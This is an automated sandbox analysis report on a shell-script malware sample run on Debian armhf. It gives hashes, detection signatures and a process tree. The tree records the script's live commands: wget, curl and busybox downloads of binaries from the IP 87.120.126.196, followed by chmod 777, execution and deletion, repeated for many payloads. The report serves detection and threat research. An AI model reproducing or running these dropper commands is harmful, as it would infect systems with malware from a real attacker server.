Analysis
- max time kernel: 20s
- max time network: 21s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 25/10/2024, 01:20
- Static task static1
- Behavioral task behavioral1: sample 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh, resource ubuntu1804-amd64-20240729-en
- Behavioral task behavioral2: sample 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh, resource debian9-armhf-20240611-en
- Behavioral task behavioral3: sample 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh, resource debian9-mipsbe-20240729-en
- Behavioral task behavioral4: sample 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh, resource debian9-mipsel-20240611-en
General
- Target: 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
- Size: 10KB
- MD5: e85cfec36f14cf1239aeb4b66816d9b6
- SHA1: 54996a37402bd68d4d9592629ba35466aa659e7b
- SHA256: 2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583
- SHA512: 300a5cf3328c8392a91bc401ade0843b0d426078b4a7d026b0cfa6bc9959bb8f607eb8cdd63250e780224fc8cb68aea66d2993f7ad08286732684e392cfcf415
- SSDEEP: 192:S9G+eTfUXv3+Cs6BK+u+K+j+2+e+Z9p1gG+BFUp1gGC1xQTfUXvt+Cs6E+u+K+j+:S9G+Hcr+BFOC1xq
Malware Config
Signatures
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid | Process
- 678 | chmod
- 847 | chmod
- 873 | chmod
- 867 | chmod
- 879 | chmod
- 791 | chmod
- 807 | chmod
- 823 | chmod
- 855 | chmod
- 817 | chmod
- 688 | chmod
- 747 | chmod
- 763 | chmod
- 769 | chmod
- 835 | chmod
- 841 | chmod
- 861 | chmod
- 697 | chmod
- 713 | chmod
- 729 | chmod
- 829 | chmod
Executes dropped EXE 21 IoCs
ioc | pid | Process
- /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | 679 | wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
- /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | 689 | pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
- /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | 699 | VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
- /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | 715 | ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0
- /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | 731 | bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf
- /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | 749 | TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk
- /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | 764 | KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh
- /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | 770 | zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC
- /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | 792 | Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR
- /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | 808 | 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx
- /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | 818 | 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
- /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | 824 | cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
- /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | 830 | 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
- /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | 836 | res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
- /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | 842 | 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu
- /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | 848 | cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY
- /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | 856 | 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959
- /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | 862 | res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR
- /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | 868 | wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ
- /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | 874 | pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z
- /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | 880 | VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI
Checks CPU configuration 1 TTPs 21 IoCs
Reads CPU information, which can indicate whether the system is a virtual machine.
description | ioc | Process
- File opened for reading | /proc/cpuinfo | curl (21 identical entries, one per curl process)
Reads runtime system information 42 IoCs
description | ioc | Process
- File opened for reading | /proc/self/auxv | curl (21 entries, one per curl process)
- File opened for reading | /proc/sys/crypto/fips_enabled | curl (21 entries, one per curl process)
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
description | ioc | Process
- File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | curl
- File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | curl
- File opened for modification | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | curl
- File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | curl
- File opened for modification | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | curl
- File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | curl
- File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | curl
- File opened for modification | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | curl
- File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | curl
- File opened for modification | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | curl
- File opened for modification | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | curl
- File opened for modification | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | curl
- File opened for modification | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | curl
- File opened for modification | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | curl
- File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | curl
- File opened for modification | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | curl
- File opened for modification | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | curl
- File opened for modification | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | curl
- File opened for modification | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | curl
- File opened for modification | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | curl
- File opened for modification | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | curl
Processes
Each row: PID | image | command line | signatures. Signature codes: CPU = Checks CPU configuration, RSI = Reads runtime system information, TMP = Writes file to tmp directory, PERM = File and Directory Permissions Modification, EXE = Executes dropped EXE. Indented rows are children of the top-level script process.
- 648 | /tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh | /tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh |
  - 650 | /bin/rm | /bin/rm bins.sh |
  - 652 | /usr/bin/wget | wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ |
  - 665 | /usr/bin/curl | curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | CPU, RSI, TMP
  - 674 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ |
  - 678 | /bin/chmod | chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | PERM
  - 679 | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | EXE
  - 680 | /bin/rm | rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ |
  - 682 | /usr/bin/wget | wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z |
  - 686 | /usr/bin/curl | curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | CPU, RSI, TMP
  - 687 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z |
  - 688 | /bin/chmod | chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | PERM
  - 689 | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | ./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | EXE
  - 690 | /bin/rm | rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z |
  - 691 | /usr/bin/wget | wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI |
  - 692 | /usr/bin/curl | curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | CPU, RSI, TMP
  - 694 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI |
  - 697 | /bin/chmod | chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | PERM
  - 699 | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | ./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | EXE
  - 700 | /bin/rm | rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI |
  - 701 | /usr/bin/wget | wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 |
  - 706 | /usr/bin/curl | curl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | CPU, RSI, TMP
  - 710 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 |
  - 713 | /bin/chmod | chmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | PERM
  - 715 | /tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | ./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 | EXE
  - 716 | /bin/rm | rm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 |
  - 717 | /usr/bin/wget | wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf |
  - 721 | /usr/bin/curl | curl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | CPU, RSI, TMP
  - 726 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf |
  - 729 | /bin/chmod | chmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | PERM
  - 731 | /tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | ./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf | EXE
  - 732 | /bin/rm | rm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf |
  - 733 | /usr/bin/wget | wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk |
  - 737 | /usr/bin/curl | curl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | CPU, RSI, TMP
  - 743 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk |
  - 747 | /bin/chmod | chmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | PERM
  - 749 | /tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | ./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk | EXE
  - 751 | /bin/rm | rm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk |
  - 753 | /usr/bin/wget | wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh |
  - 757 | /usr/bin/curl | curl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | CPU, RSI, TMP
  - 761 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh |
  - 763 | /bin/chmod | chmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | PERM
  - 764 | /tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | ./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh | EXE
  - 765 | /bin/rm | rm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh |
  - 766 | /usr/bin/wget | wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC |
  - 767 | /usr/bin/curl | curl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | CPU, RSI, TMP
  - 768 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC |
  - 769 | /bin/chmod | chmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | PERM
  - 770 | /tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | ./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC | EXE
  - 771 | /bin/rm | rm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC |
  - 772 | /usr/bin/wget | wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR |
  - 783 | /usr/bin/curl | curl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | CPU, RSI, TMP
  - 787 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR |
  - 791 | /bin/chmod | chmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | PERM
  - 792 | /tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | ./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR | EXE
  - 793 | /bin/rm | rm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR |
  - 794 | /usr/bin/wget | wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx |
  - 799 | /usr/bin/curl | curl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | CPU, RSI, TMP
  - 804 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx |
  - 807 | /bin/chmod | chmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | PERM
  - 808 | /tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | ./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx | EXE
  - 810 | /bin/rm | rm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx |
  - 811 | /usr/bin/wget | wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu |
  - 815 | /usr/bin/curl | curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | CPU, RSI, TMP
  - 816 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu |
  - 817 | /bin/chmod | chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | PERM
  - 818 | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | ./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | EXE
  - 819 | /bin/rm | rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu |
  - 820 | /usr/bin/wget | wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY |
  - 821 | /usr/bin/curl | curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | CPU, RSI, TMP
  - 822 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY |
  - 823 | /bin/chmod | chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | PERM
  - 824 | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | ./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | EXE
  - 825 | /bin/rm | rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY |
  - 826 | /usr/bin/wget | wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 |
  - 827 | /usr/bin/curl | curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | CPU, RSI, TMP
  - 828 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 |
  - 829 | /bin/chmod | chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | PERM
  - 830 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | ./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | EXE
  - 831 | /bin/rm | rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 |
  - 832 | /usr/bin/wget | wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR |
  - 833 | /usr/bin/curl | curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | CPU, RSI, TMP
  - 834 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR |
  - 835 | /bin/chmod | chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | PERM
  - 836 | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | ./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | EXE
  - 837 | /bin/rm | rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR |
  - 838 | /usr/bin/wget | wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu |
  - 839 | /usr/bin/curl | curl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | CPU, RSI, TMP
  - 840 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu |
  - 841 | /bin/chmod | chmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | PERM
  - 842 | /tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | ./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu | EXE
  - 843 | /bin/rm | rm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu |
  - 844 | /usr/bin/wget | wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY |
  - 845 | /usr/bin/curl | curl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | CPU, RSI, TMP
  - 846 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY |
  - 847 | /bin/chmod | chmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | PERM
  - 848 | /tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | ./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY | EXE
  - 849 | /bin/rm | rm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY |
  - 850 | /usr/bin/wget | wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 |
  - 851 | /usr/bin/curl | curl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | CPU, RSI, TMP
  - 853 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 |
  - 855 | /bin/chmod | chmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | PERM
  - 856 | /tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | ./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 | EXE
  - 857 | /bin/rm | rm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959 |
  - 858 | /usr/bin/wget | wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR |
  - 859 | /usr/bin/curl | curl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | CPU, RSI, TMP
  - 860 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR |
  - 861 | /bin/chmod | chmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | PERM
  - 862 | /tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | ./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR | EXE
  - 863 | /bin/rm | rm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR |
  - 864 | /usr/bin/wget | wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ |
  - 865 | /usr/bin/curl | curl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | CPU, RSI, TMP
  - 866 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ |
  - 867 | /bin/chmod | chmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | PERM
  - 868 | /tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ | EXE
  - 869 | /bin/rm | rm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ |
  - 870 | /usr/bin/wget | wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z |
  - 871 | /usr/bin/curl | curl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | CPU, RSI, TMP
  - 872 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z |
  - 873 | /bin/chmod | chmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | PERM
  - 874 | /tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | ./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z | EXE
  - 875 | /bin/rm | rm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z |
  - 876 | /usr/bin/wget | wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI |
  - 877 | /usr/bin/curl | curl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | CPU, RSI, TMP
  - 878 | /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI |
  - 879 | /bin/chmod | chmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | PERM
  - 880 | /tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | ./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI | EXE
  - 881 | /bin/rm | rm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI |
  - 882 | /usr/bin/wget | wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0 |
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97